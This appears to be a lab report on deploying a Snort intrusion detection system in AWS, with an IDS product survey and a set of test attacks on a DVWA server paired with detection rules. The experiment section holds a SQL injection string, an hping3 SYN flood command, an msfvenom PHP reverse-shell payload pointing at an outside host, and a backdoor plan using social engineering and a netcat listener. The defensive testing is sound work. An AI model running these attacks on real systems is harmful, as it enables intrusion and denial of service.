Motivation

IDS stands for Intrusion Detection System. It is a security technology used to monitor network traffic or system activities for signs of unauthorized access, malicious activities, or security policy violations. The primary goal of an IDS is to detect potential security breaches and raise alerts to administrators or security personnel, enabling them to take appropriate action and prevent potential threats from escalating.

In a cloud environment, the need for an Intrusion Detection System (IDS) remains significant, and in some ways, it becomes even more critical due to the unique security challenges presented by cloud computing. Here are some of the reasons why IDS is needed in a cloud environment:

1. Increased Attack Surface: Cloud environments typically have a larger attack surface compared to traditional on-premises setups. Multiple virtual machines, containers, and services may be running on shared infrastructure. This complexity can lead to more potential entry points for attackers, making continuous monitoring and threat detection essential.
2. Dynamic and Elastic Nature: Cloud environments are highly dynamic and elastic, with resources being provisioned and de-provisioned on demand. The rapid scaling and changing network configurations can make it challenging to maintain visibility and control over the entire infrastructure. An IDS helps track these changes and detects potential security issues in real time.
3. Shared Responsibility Model: In most cloud service models (e.g., Infrastructure as a Service - IaaS, Platform as a Service - PaaS), there is a shared responsibility model between the cloud service provider (CSP) and the customer. While the CSP is responsible for the security of the cloud infrastructure, the customer is responsible for securing their data, applications, and access controls. An IDS on the customer's side enhances their ability to monitor and protect their assets.
4. Zero Trust Architecture: Cloud environments often follow a zero trust architecture, where trust is not automatically granted to any user or device, even if they are within the corporate network. An IDS helps validate and enforce security policies, ensuring that suspicious activities are identified and acted upon promptly.
5. Visibility into Encrypted Traffic: With the widespread use of Transport Layer Security (TLS) encryption, malicious activities can be concealed within encrypted traffic. Advanced IDS solutions can perform SSL/TLS decryption to analyze the contents of encrypted packets and identify potential threats.
6. Compliance and Regulatory Requirements: Many industries have strict compliance and regulatory requirements for data security. Implementing an IDS in the cloud environment helps meet these obligations by providing continuous monitoring and threat detection capabilities.
7. Protection against Insider Threats: Insider threats are a significant concern in any environment, including the cloud. An IDS can monitor user activities and detect abnormal behavior, helping to identify potential insider threats or compromised accounts.
8. Early Detection of Threats: An IDS can provide early warning signs of potential security breaches, allowing security teams to respond quickly and mitigate the impact of attacks before they cause significant damage.

When deploying an IDS in a cloud environment, it's essential to consider factors such as scalability, integration with cloud-native technologies, and the ability to monitor both network and host activities across the cloud infrastructure. Combining IDS with other security solutions, such as Intrusion Prevention Systems (IPS), firewalls, and Security Information and Event Management (SIEM) systems, can create a comprehensive security posture to protect cloud-based assets effectively.

Overview

Trending IDS solution

Open-source IDS solution

1. Snort: a popular open-source IDS (Intrusion Detection System), that uses configuration rules to detect and report intrusive behaviors within a network.
2. Suricata: a powerful and efficient open-source IDS/IPS, supporting multi-threading intrusion detection and prevention in a network.
3. Zeek (formerly known as Bro): an open-source IDS that utilizes robust data structures to monitor and analyze network traffic, helping to identify suspicious and potential activities within the network.
4. OSSEC: an open-source HIDS (Host-based Intrusion Detection System), monitoring activities on individual hosts to detect and report security incidents.

Enterprise IDS solution

1. Trend Micro TippingPoint: A heavyweight IDPS intrusion prevention system that safeguards networks from cyber threats through advanced threat intelligence and prevention mechanisms by offering exceptional threat intelligence, virtual patching, and deep packet inspection, ensuring proactive defense against the latest cyber threats.
2. Hillstone S-Series: A cutting-edge next-generation firewall solution integrated with advanced threat protection capabilities, ensuring comprehensive network security by integrating advanced threat protection, application visibility, and user behavior analytics, providing comprehensive security and control over network traffic.
3. Secureworks iSensor: A reliable network intrusion detection system (NIDS) that continuously monitors suspicious activities and potential threats to enhance cybersecurity posture. Boasts high-performance threat detection, automated response capabilities, and customizable rule sets, enabling efficient identification and mitigation of potential security incidents.
4. Cisco IDPS: Cisco's comprehensive Intrusion Detection and Prevention System, is designed to provide real-time threat defense and protect networks from evolving cyberattacks. Stands out with its scalable architecture, continuous monitoring, and rapid threat response, empowering organizations to defend against sophisticated attacks with minimal disruption.

IDS on Cloud: Challenge

1. Cloud data confidentiality issue
   Data classification in the cloud is one of the things about obvious security issues. With typical system encryption of data is possible. Possibly, the encrypted data is often protected from a malicious customer, but currently, cloud developers still do not have IDS for their platform and still have to use IDS solutions from other vendors, so protecting data from third parties such as IDS is also a challenge.
2. Dynamic Scalability
   The dynamic scaling of resources in a cloud environment requires an IDS to be flexible and adaptive to effectively monitor the network. Compatibility with changing environments in terms of architecture, resource optimization, concurrent network traffic handling, and interoperability between IDS sensors are critical to ensuring system availability and efficiency and avoid to create a blind spot in the network. However, overcoming these challenges will ensure that the IDS performs well in diverse cloud environments and meets users' security requirements.
3. Network Virtualization
   When deploying IDS in the cloud, the main technique is network virtualization. This includes synchronizing network information, integrating with network management systems, processing virtual network traffic, and analyzing traffic between virtual networks. IDSs need to be functional, high-performance, and reasonably good to ensure the monitoring and detection of cyber threats in a cloud environment. This requires a solution that optimizes and adapts the IDS to respond to the complexity and diversity of cloud environments.
4. Shared resources
   In the cloud, services, and resources share the same physical infrastructure, so resource allocation and IDS prioritization for large amounts of resources will be key for fast response and key detection. tall body. In addition, IDS must be able to scale and applications to adapt quickly, because the network model in the cloud will always expand, resulting in the IDS, must be able to effectively monitor and manage network traffic.

Impacts of Cloud service models on IDS

https://www.bmc.com/blogs/saas-vs-paas-vs-iaas-whats-the-difference-and-how-to-choose/

1. IaaS (Infrastructure as a Service): provides basic resources such as servers, networks, and storage, and users have full control over this environment. The influencing factors of IaaS for IDS development include:
   • Infrastructure management: Since users have complete control over the infrastructure, understanding the network architecture makes IDS deployment and configuration easier. IDS can be developed and exploited on virtual servers in IaaS and managed more easily.
   • Monitor network traffic: IDS can monitor network traffic between servers and applications in IaaS to detect suspicious and intrusive activities.
   • Access: IaaS provides high-level access to resources, so IDS can have access to data and insights for analysis and monitoring.
2. PaaS (Platform as a Service): provides an application development and deployment environment. The platform hides infrastructure management and helps developers build applications without listening to the infrastructure. The influencing factors of PaaS for IDS development include:
   • Limited access: PaaS limits access to infrastructure, so IDS cannot have full access to the resources needed to monitor and detect threats.
   • Application Monitoring: IDS in PaaS can be limited to monitoring network traffic between applications that are exploited on the platform.
   • PaaS integration: IDS needs to integrate with PaaS services to be able to respond to requests and get logging from traffic
3. Saas (Software as a Service): provides pre-developed applications and is accessible over the Internet. Factors that influence SaaS for IDS implementations include:
   • Limited access: In SaaS, users do not have direct access to infrastructure or storage, so IDSs may have access restricted for surveillance breaches.
   • Limited customization: SaaS often does not allow customization of application complexity, which can limit the ability to develop IDS and integrate it into applications.
   • Controls of SaaS Providers: IDSs need to comply with the rules and policies applied by the SaaS provider, which may limit the ability to customize and exploit the IDS.

Solution comparison

IDSs are used to enhance the security of computer networks and systems. Some reasons why organizations use IDS:

1. Threat detection: IDS can identify and alert various types of suspicious or malicious activities within a network. They monitor network traffic, system logs, and other data sources to detect signs of unauthorized access attempts, malware infections, and other security threats.
2. Incident response: IDS can play a crucial role in incident response by providing timely notifications when potential security incidents occur. They can help security teams investigate and respond to incidents promptly, minimizing the impact of a breach or compromise.
3. Real-time monitoring: IDS continuously monitors network activity and generates alerts in real-time, allowing security personnel to quickly respond to potential threats. This proactive monitoring can help prevent or mitigate security incidents before they cause significant damage.
4. Compliance requirements: Many industries and regulatory frameworks require the implementation of IDS as part of their security compliance measures. Organizations may need IDS to meet specific security standards, such as the Payment Card Industry Data Security Standard (PCI DSS) or the Health Insurance Portability and Accountability Act (HIPAA).
5. Network visibility: IDS can provide valuable insights into network traffic patterns, anomalies, and potential vulnerabilities. By analyzing network data, organizations can gain a better understanding of their network infrastructure, identify areas for improvement, and enhance overall network security.
6. Forensic analysis: IDS logs and alerts can be used for forensic analysis in the event of a security incident. They provide a historical record of network activity, aiding in the investigation, and analysis of security breaches or unauthorized activities.

Overall, IDS plays a crucial role in network security by detecting and alerting potential threats, enabling organizations to respond effectively and protect their systems and data from unauthorized access and malicious activities.

Criteria for evaluating IDS systems:

• Performance
• Features
• Detection range
• Integration and extensibility
• Cost and value

The table below compares various open-source IDS solutions along with their capabilities:

Source: https://www.dnsstuff.com/network-intrusion-detection-software

Compare IDS & Cloud Security Solutions

https://www.trendmicro.com/en_vn/business/products/network/intrusion-prevention.html
https://www.ibm.com/qradar https://azure.microsoft.com/en-us/products/microsoft-sentinel
https://cloud.google.com/security-command-center https://aws.amazon.com/vi/guardduty/

Compare IDS & AWS Security Solutions

Disadvantages:

• AWS GuardDuty:
  • Limited customization (not provide users with the same customization and detailed configuration as a traditional IDS system)
  • Dependencies on AWS logs and data from other services like VPC Flow logs
• AWS Firewall:
  • Only focus on layer 7 (Application)
• AWS Inspector:
  • Not provided real-time monitoring and real-time threat detection
• AWS Macie:
  • Focus on sensitive data discovery and provide methods for protection (look like database security solutions)

Study Cloud-Based Threat Intelligence Sources

Cloud-based threat intelligence is essential for enhancing the security of cloud services and assets. These intelligence feeds and sources provide up-to-date information on emerging threats, vulnerabilities, and attack patterns specific to cloud environments. Integrating these sources with an Intrusion Detection System (IDS) can significantly improve the system's ability to detect and respond to potential threats. Here are some cloud-specific threat intelligence feeds and sources you can research:

1. Cloud Service Providers (CSPs) Security Advisories: Many cloud service providers regularly release security advisories that detail vulnerabilities, best practices, and security updates for their platforms. Subscribing to these advisories can provide critical insights into cloud-specific threats.
2. Cloud Access Security Brokers (CASBs): CASBs offer cloud security services, including threat intelligence feeds tailored to cloud environments. They monitor cloud activity and can provide valuable information on potential threats and security incidents.
3. Cloud Security Blogs and Research Reports: Numerous cloud security vendors and independent security researchers publish blogs, white papers, and research reports that analyze cloud-related threats. Following these sources can keep you updated on the latest trends and attack vectors.
4. Cloud Threat Intelligence Platforms: Some companies specialize in aggregating and analyzing cloud threat intelligence. These platforms offer feeds with real-time data, including threat indicators and patterns targeting cloud services.
5. Open-source Threat Intelligence Feeds: Open-source threat intelligence projects, such as Open Threat Exchange (OTX) or MISP (Malware Information Sharing Platform), often include cloud-specific threat indicators contributed by the security community.
6. Industry-Specific Threat Intelligence Sharing Groups: In some industries, organizations collaborate through sharing groups to exchange threat intelligence. These groups may have a focus on cloud security and can provide valuable information on sector-specific threats.
7. Cloud Security Conferences and Events: Attending cloud security conferences and events can help you stay up-to-date on the latest threats, vulnerabilities, and defense strategies for cloud environments.
8. Cybersecurity Information Sharing and Analysis Centers (ISACs): Some ISACs are dedicated to specific sectors (e.g., financial, healthcare, etc.) and may have cloud security-focused intelligence-sharing initiatives.
9. Government Cybersecurity Agencies: Government agencies may offer cloud security advisories and threat intelligence feeds relevant to their jurisdiction.

When integrating these cloud-based threat intelligence feeds with an IDS, consider employing automation and machine learning techniques to process and analyze the data effectively. This will enable quicker identification of emerging threats and better protection for cloud services and assets. Keep in mind that threat intelligence is most effective when combined with other security measures, such as access controls, encryption, and continuous monitoring.

Proposed Architecture

1 VPC:

• 2 Public subnet:
  • Subnet 1:
    • Web Server: EC2 with Elastic IP
  • Subnet 2:
    • IDS (IDPS optional): EC2 with Snort
    • NAT gateway
• 1 Private subnet:
  • Database server: RDS with MySQL
• Internet gateway: for internet access

Experiment

Web Server’s public IP address: 52.221.55.25

• Scenario 1: Ping:

  • Snort rule:
    alert icmp any any -> any any (msg: "ICMP Traffic Detected"; sid: 10001; rev: 1;)
  • Video: https://drive.google.com/file/d/1ZqQDL1VTS8Upl-a5B-eODe8fLSM75ycm/view?usp=sharing

• Scenario 2: SQLi:

  • URL: http://52.221.55.25/DVWA/vulnerabilities/sqli/
  • Script: %' OR '1'='1
  • Snort rule:
    • drop tcp any any -> any 80 (msg: "Error Based SQL Injection Detected"; content: "OR" ; sid:100000003; )
    • drop tcp any any -> any 80 (msg: "Error Based SQL Injection Detected"; content: "or" ; sid:100000012; )
  • Video: https://drive.google.com/file/d/1ZpidKYj1yoxk2U74VuKf6WK8_IMNmXKU/view?usp=sharing

• Scenario 3: DOS:

  • Hping3: hping3 -S --flood -V -p 80 52.221.55.25
    • -S: TCP SYN Flag
    • –flood: sending packets as fast as possible
    • -V: verbose
    • -p: port
  • Snort rule:
    alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Possible SYN Flood Attack Detected"; flags:S; threshold: type both, track by_dst, count 30, seconds 1; sid:10015; rev:1;)
  • Video: https://drive.google.com/file/d/1hdcXXej2yUcshIPj_-d5sY8YivS8LFQF/view?usp=sharing

• Scenario 4: Reverse Shell Pattern in Upload file (PHP)

  • URL: http://52.221.55.25/DVWA/vulnerabilities/upload/
  • Payload: msfvenom -p php/meterpreter/reverse_tcp LHOST=52.77.154.202 LPORT=4444 -f raw > malicious.php
  • Snort rule:
    drop any any -> any 80 (msg: "Reverse Shell Detect in file uploaded: /bin/sh"; content: "/bin/sh" ; sid:100000004; )
  • Video: https://drive.google.com/file/d/1toWCAqeCe82w1bYt10vDLyT6iVXiwlbz/view?usp=sharing

• Scenario 5: Bruteforce FTP credentials (Hydra)

  • FTP server: ftp://52.221.55.25
  • Snort rule:
    drop tcp any any -> any 21 (msg:"FTP brute force attack"; flow: to_server; content: "USER"; threshold: type threshold, track by_src, count 1, seconds 60;sid: 100000013; rev:1;)
  • Video: https://drive.google.com/file/d/1j4Bu_dhIjUpNbMCN7FK090N1B7MxBmvx/view?usp=sharing

• Scenario 6: Malware Backdoor Trojan

  • Idea:

    1. Using msfvenom to generate reverse shell payload
    2. Using social engineering to trigger target run payload/create a reverse shell
    3. Open nc listener on the attacker's machine for reverse shell connection
    
    • Detect: Use the “Emerging Threats” rule to detect reverse shell connection

  • Rule:
    alert tcp any any -> any any (msg:"ET MALWARE Backdoor Trojan detected"; flow:from_server,established; content:"|60 89 e5 31|"; content:"|64 8b|"; distance:1; within:2; content:"|30 8b|"; distance:1; within:2; content:"|0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff|"; distance:1; within:13; content:"|ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2|"; within:15; content:"|52 57 8b 52 10|"; distance:1; within:5; classtype:trojan-activity; sid:23; rev:4; metadata:affected_product Any, attack_target Client_and_Server, created_at 2016_05_16, deployment Perimeter, deployment Internet, deployment Internal, deployment Datacenter, former_category TROJAN, signature_severity Critical, tag Metasploit, updated_at 2018_07_10;)

  • Test on VMware machine:
    

    
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →

Conclusion

Deploying IDS in the cloud environment is important and necessary, in case you want to protect the confidentiality and integrity of your data:

• IDS provides powerful network protection with features that are superior to or on par with other cloud security along with IDS-only features such as Deep Packet Inspection, Traffic Blocking, TCP Session Break, etc.
• Cloud platforms, more specifically AWS, is an IaaS platform where users have complete understanding of their network architecture, making it easier to deploy IDS at critical locations, enabling maximum utilization of IDS capabilities.
• Cloud-Based Threat Intelligence Sources from CSPs (Cloud Service Providers), vendors, and security teams around the world play an important role in enhancing IDS’s security performance and threats detection/response in the cloud, helping organizations keep their data and infrastructure safe and secure.

Limitations

EC2 t2.micro configuration: 1GB RAM

1. Can’t snort in inline mode (huge traffic going through 2 interfaces crashes snort)
2. Can't run Netcat and snort simultaneously (RAM overflow)

Future development direction

• Deploy IDS sensors in different VPCs, use VPC Peering and Transit Gateway to communicate and integrate with ELK Stack on-premises for collection, storage, log processing, and incident response combined with IDS automated defense (block, drop, reject)
• …

Reference

https://sci-hub.se/https://ieeexplore.ieee.org/document/8122180
https://coralogix.com/docs/coralogix-sta-vs-others/
https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_Tutorials.WebServerDB.CreateWebServer.html
https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html
https://www.gartner.com/reviews/market/intrusion-prevention-systems